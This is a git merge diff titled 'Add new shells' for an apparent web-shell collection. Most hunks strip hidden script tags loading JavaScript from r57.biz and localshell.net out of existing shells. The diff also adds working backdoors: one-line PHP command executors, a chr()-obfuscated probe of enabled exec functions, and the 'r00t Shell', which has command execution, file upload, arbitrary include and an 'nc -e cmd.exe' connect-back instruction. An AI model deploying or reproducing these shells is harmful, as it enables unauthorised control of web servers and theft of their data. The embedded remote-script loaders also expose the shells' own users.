Merge pull request #6 from halitalptekin/master

Add new shells

php/CWShellDumper.php

@@ -364,7 +364,6 @@ border: solid 1px #363636;
 </style>
 
 </head>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
 <table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
 <tr><td>
@@ -372,7 +371,6 @@ border: solid 1px #363636;
 <font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
 <font size='6' face='Webdings'>ü</font></b>
 </center>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 </td></tr></table><table class=menu width=100%<tr><td>
 <font size='1' face='Verdana'><b>Site:  </b><u>$site</u> <br>
 <b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>

php/aspx.php

@@ -2311,12 +2311,9 @@ yhv.Visible=false;
 }
 </script>
 <html xmlns="http://www.w3.org/1999/xhtml" >
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <head id="Head1" runat="server">
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
 <title>ASPXspy</title>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <style type="text/css">
 .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
 body,td{font: 12px Arial,Tahoma;line-height: 16px;}

php/cmd.php

@@ -1066,14 +1066,12 @@ Response.Write endcode
 if showdisks then
 
 %>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 	<script language=javascript>
 		// DRIVE ISLEMLERI
 		function driveGo(drive_){
 			location = "?raiz="+drive_+":";
 		}
 	</script>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 
 <%
 

php/dq.php

@@ -2638,14 +2638,12 @@ function chg_arg(num,txt1,txt2) {
 <tr><td align=right>Search File:</td>
 <td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
     <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
-    </form><SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
     </td></tr>
 <tr><td align=right>Create File:</td>
 <td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
     <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create"> <?php echo $wdt; ?>
     </form></td></tr>
 <tr><td align=right>View File:</td>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
     <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type=submit value="View">
     </form></td></tr>
@@ -3099,7 +3097,6 @@ $html_start = '
 <title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
 '.$style.'
 </head>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <body>
 <div class=bartitle><h4>'.sh_name().'</h4>.: r57.biz Dq99Shell :.</div>
 ';

php/ekin0x.php

@@ -47,7 +47,6 @@ function download($dwfile) {$size = filesize($dwfile);
 @header("Pragma: no-cache");
 @readfile($dwfile); exit;}
 ?>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <html> 
 <head><title>Ekin0x Shell</title></head>
 <style> 
@@ -63,7 +62,6 @@ select{background-color: #191919; font-size: 12px; color: #dadada; font-family:
 </html> 
 <?
 $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 $sf="<form method=post>";$ef="</form>";
 $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
 $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";

php/kacak.php

@@ -76,7 +76,6 @@ if request.querystring("yenidosya") <> "" then
     <img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
     <td width="501" bgcolor="#000000" height="76" valign="top">
     <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
-    <SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
     <span style="font-weight: 700">
     <br>
     TC & GH & TC TEAM ©<br>
@@ -751,7 +750,6 @@ Set dosyalar = klasor.files
 			
 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
   <tr>
-<SCRIPT SRC=http://www.localshell.net/yazciz/ciz.js></SCRIPT>
     <td width="30" height="17" bgcolor="#9F9F9F">
     <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
     <td height="17" bgcolor="#9F9F9F">
@@ -819,7 +817,6 @@ Set dosyalar = klasor.files
 
 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
   <tr>
-    <SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
     <td width="30" height="1" bgcolor="#B0B0B0">
     <p align="center">
     <img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
@@ -895,7 +892,6 @@ end if
 
 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
   <tr>
-<SCRIPT SRC=http://www.r57.biz/yazciz/ciz.js></SCRIPT>
     <td width="100%" bgcolor="#000000">&nbsp;</td>
   </tr>
 </table>

php/login.php

@@ -560,7 +560,6 @@ indexform.index.value=indexform.index.value + "<br>";
 bordercolorlight="#008000"><th><a onclick='return center()'>Center</a> ||| <a onclick='return left()'>Left</a> ||| <a onclick='return right()'>right</a> ||| <a onclick='return b()'>Bold</a> ||| <a onclick='return u()'>UnderLine</a> ||| <a onclick='return i()'>Italic</a> ||| <a onclick='return br()'>NewLine</a> ||| <a onclick='return colour()'>Colour</a> ||| <a onclick='return mar()'>Marquee ||| <a onclick='return img()'>Picture</a> ||| <a onclick='return link()'>Link</a></a></th><tr><TD>
 <center><form name="indexform" action="" method="post"><textarea name='index' rows='14' cols='86'></textarea></p>
 </form></form></center>
-<SCRIPT SRC=http://www.r57.biz/yazciz/ciz.js></SCRIPT>
 </TD></tr><tr><td>Copy The Code after Finishing your index</td></tr></table>
 <?
 }

php/micro.php

@@ -0,0 +1 @@
+<?php @extract($_REQUEST); @die ($ctime($atime)); ?>

php/r00t.php

@@ -0,0 +1,246 @@
+<!--
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
+/*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
+/*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
+/*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
+/*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
+/*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
+/*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
+/*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
+/*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
+/*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
+/*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
+/*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
+/*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
+/*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
+/*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
+/*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
+/*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
+/*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
+/*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
+/*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
+/*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
+/*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
+/*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
+/*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
+/*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
+/*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
+/*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
+/*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
+/*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
+/*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
+/*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
+/*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
+/*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
+/*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
+/*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
+/*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*    r00t.txt - r00t Shell - root Shell www.hackerbox.net
+/*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
+/*    Also I think we should increase the last version number by 1 if you make some changes.
+/*
+/*    CHANGES / VERSION HISTORY:
+/*    ====================================================================================
+/*    Version        Nick            Description
+/*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
+/*    0.3.1          666            added an ascii bug :)
+/*    0.3.1          666            password protection
+/*    0.3.1          666            GET and POST changes
+/*    0.3.2          666            coded a new uploader
+/*    0.3.2          666            new password protection
+/*    0.3.3          666            added a lot of comments :)
+/*    0.3.3          666            added "Server Info"
+/*    1.0.0          666            added "File Inclusion"
+/*    1.0.0          666            removed password protection (nobody needs it...)
+/*    1.0.0          666            added "Files & Directories"
+/*
+/*
+-->
+<?
+//
+// Default Changes
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+$owner        = "Hacker";                                                      // Insert your nick
+$version      = "1.0.0";                                                        // The version  
+
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+//
+?>
+
+<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
+<style type="text/css">
+body{
+cursor:crosshair
+}
+</style>
+<div align="center" style="width: 100%; height: 100">
+<pre width="100%" align="center"><strong> ____            _        ____  _          _ _
+|  _ \ ___  ___ | |_      / ___|| |__  ___| | |
+| |_) / _ \ / _ \| __|    \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_  _  ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
+</div></strong>
+<b><u><center><?php echo "This server has been infected by $owner"; ?></center></u></b>
+<hr color="#000000" size="2,5">
+
+<div align="center">
+  <center>
+  <p>
+  <?php
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+  print '<font color=#FF0000><b>Safe Mode ON</b></font>';
+} else {
+  print '<font color=#008000><b>Safe Mode OFF</b></font>';
+}
+
+?>
+</p><font face="Webdings" size="6">!</font><br>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
+    <tr>
+      <td width="1%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center">
+        <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
+        <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
+        <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
+        </font></tr>
+  </table><br />
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
+      <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center"><form method="post">
+<p align="center">
+<br>
+<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
+<br>
+<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
+<br><input type="submit" value="Execute!"><br>
+<br></p>
+      </form>
+      <p align="center">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
+        <br>
+        <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
+        back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
+        </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
+<form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt"> </font><br>
+<input type="submit" value="Upload File!"> <br>
+</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>File already exist</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>File uploaded successful</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>File not found</p>";
+        }
+    }
+}
+?>
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+
+      </tr>
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="231">
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <p align="center"> </td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+      Include
+      something :)<br>
+      <br>
+</font><form method="POST">
+      <p align="center">
+        <input type="text" name="incl" size="20"><br>
+        <br>
+        <input type="submit" value="Include!" name="inc"></p>
+      </form>
+      <?php @$output = include($_POST['incl']); ?>
+      </td>
+    </tr>
+  </table>
+  </center>
+</div>
+<br /></p>
+<div align="center">
+  <center>
+  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
+    <tr>
+      <td width="100%" bgcolor="#FCFEBA" height="20">
+      <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
+    </tr>
+  </table>
+  </center>
+</div>

php/s1.php

@@ -0,0 +1 @@
+<?php $f=chr(99).chr(104).chr(114);$a=array($f(101).$f(120).$f(101).$f(99),$f(115).$f(104).$f(101).$f(108).$f(108).$f(95).$f(101).$f(120).$f(101).$f(99),$f(115).$f(121).$f(115).$f(116).$f(101).$f(109),$f(112).$f(97).$f(115).$f(115).$f(116).$f(104).$f(114).$f(117),$f(112).$f(99).$f(110).$f(116).$f(108).$f(95).$f(101).$f(120).$f(101).$f(99),$f(112).$f(114).$f(111).$f(99).$f(95).$f(111).$f(112).$f(101).$f(110),$f(112).$f(111).$f(112).$f(101).$f(110));$b=get_defined_functions();$b=$b[$f(105).$f(110).$f(116).$f(101).$f(114).$f(110).$f(97).$f(108)];$c=ini_get($f(100).$f(105).$f(115).$f(97).$f(98).$f(108).$f(101).$f(95).$f(102).$f(117).$f(110).$f(99).$f(116).$f(105).$f(111).$f(110).$f(115));if($c==null){$c=array();}else{$c=explode($f(44),$c);}foreach($a as $d){$e=$f(108).$f(105).$f(109).$f(101);if(in_array($d,$b)){if(in_array($d,$c)){$e=$f(114).$f(101).$f(100);}}else{$e=$f(111).$f(114).$f(97).$f(110).$f(103).$f(101);}echo($f(60).$f(115).$f(112).$f(97).$f(110).$f(32).$f(115).$f(116).$f(121).$f(108).$f(101).$f(61).$f(39).$f(99).$f(111).$f(108).$f(111).$f(114).$f(58).$e.$f(59).$f(39).$f(62).$d.$f(60).$f(47).$f(115).$f(112).$f(97).$f(110).$f(62).$f(10));} ?>

php/s2.php

@@ -0,0 +1 @@
+<?php $c=chr(99);if(isset($_GET[$c]))system($_GET[$c]); ?>

php/sadrazam.php

@@ -180,7 +180,6 @@ h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;
 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
 </style>
-<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
 <script type="text/javascript">
 function CheckAll(form) {
 	for(var i=0;i<form.elements.length;i++) {